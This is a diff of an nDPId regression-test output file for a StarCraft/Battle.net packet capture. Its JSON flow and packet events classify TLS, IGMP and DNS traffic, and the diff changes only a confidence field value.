00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968520,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968520,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968525,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968525,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968541,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968541,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1437389970671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389970671,"pkt":"hCYVPnXEIImEa8W6CABFAAA0DEUAAIARlo\/AqAFkrcIoFtFAAbsAIKDYDBnPzxTN69maK3zVmJ1A8q4\/WcfKtlQW"} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1437389976946,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389976946,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7AQEICgBN"} 
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1437389980126,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389980126,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7DndzYmFj"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1437389981134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981134,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2cAAIARVpXAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1437389981164,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981164,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2gAAIARVpTAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1437389981169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1437389981169,"pkt":"IImEa8W6hCYVPnXECABFAABOAABAAEARtezAqAH+wKgBZAA1z5kAOuq0W6qBgAABAAEAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAcAMAAEAAQAAAAYABFDvuho="} 
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} 
